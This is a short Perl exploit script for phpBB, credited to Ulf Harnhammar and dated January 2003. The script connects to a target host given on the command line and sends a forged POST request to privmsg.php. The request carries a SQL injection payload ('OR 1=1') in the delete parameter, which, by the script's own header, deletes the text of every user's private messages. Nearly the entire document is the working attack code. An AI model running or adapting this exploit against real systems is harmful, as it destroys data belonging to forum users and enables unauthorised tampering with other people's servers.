#!/usr/bin/perl -- # phpBB delete the text of all users' private messages exploit # Ulf Harnhammar # January 2003 use Socket; if (@ARGV != 2) { die "usage: $0 host sid\n"; } ($host, $sid) = @ARGV; $host =~ s|\s+||g; $sid =~ s|\s+||g; $crlf = "\015\012"; $http = "POST /privmsg.php?folder=inbox&sid=$sid HTTP/1.0$crlf". "Host: $host$crlf". "User-Agent: Mozzarella/1.37++$crlf". "Referer: http://www.phpbb.com/$crlf". "Connection: close$crlf". "Content-Type: application/x-www-form-urlencoded$crlf". "Content-Length: 58$crlf$crlf". "mode=&delete=true&mark%5B%5D=1%29+OR+1%3D1+%23&confirm=Yes"; $tcp = getprotobyname('tcp') or die "Couldn't getprotobyname!\n"; $hosti = inet_aton($host) or die "Couldn't look up host!\n"; $hosts = sockaddr_in(80, $hosti); socket(SOK, PF_INET, SOCK_STREAM, $tcp) or die "Couldn't socket!\n"; connect(SOK, $hosts) or die "Couldn't connect to port!\n"; select SOK; $| = 1; select STDOUT; print SOK $http; $junk = ''; while () { $junk .= $_; } close SOK or die "Couldn't close!\n";